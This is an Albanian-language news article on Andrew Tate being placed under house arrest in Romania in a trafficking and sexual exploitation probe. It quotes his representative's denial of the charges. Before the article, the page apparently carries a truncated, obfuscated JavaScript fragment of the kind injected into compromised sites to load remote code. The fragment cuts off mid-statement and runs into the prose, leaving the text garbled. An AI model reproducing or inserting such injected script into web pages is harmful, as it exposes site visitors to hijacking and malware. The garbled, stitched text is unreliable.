;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Andrew Tate aktualisht gjendet në arrest shtëpiak

By

Një gjykatë rumune ka urdhëruar që Andrew Tate të vendoset në arrest shtëpiak, ka njoftuar përfaqësuesi i tij, pasi ai ishte ndër gjashtë personat e ndaluar në një hetim mbi trafikimin e qenieve njerëzore dhe shfrytëzimin seksual.

Ish-kikboksieri profesionist dhe vëllai i tij, Tristan, ishin ndër gjashtë personat e ndaluar të mërkurën për 24 orë, pasi njësia anti-krim e organizuar e Rumanisë, Diicot, kreu katër kontrolle shtëpiake në qarkun Ilfov dhe në komunën e Bukureshtit.

Diicot kërkoi nga gjykata e Bukureshtit të arrestonte vëllezërit Tate për 30 ditë, por gjyqtari vendosi që Andrew Tate të vendoset në arrest shtëpiak dhe Tristan në kontroll gjyqësor për këtë periudhë, tha përfaqësuesja e tyre, Mateea Petrescu.

“Vëllezërit Tate përshëndesin vendimin dhe mohojnë fuqishëm të gjitha akuzat e ngritura kundër tyre, duke theksuar se akuzat janë të pabaza dhe të pambështetura nga prova të rëndësishme”, shkroi Petrescu në një deklaratë.

Vëllezërit Tate ishin akuzuar më parë në mesin e vitit 2023, së bashku me dy gra rumune, për trafikim të qenieve njerëzore, përdhunim dhe formimin e një grupi kriminal për të shfrytëzuar seksualisht gratë, akuza që ata i mohuan.

 

Artikuj të ngjashëm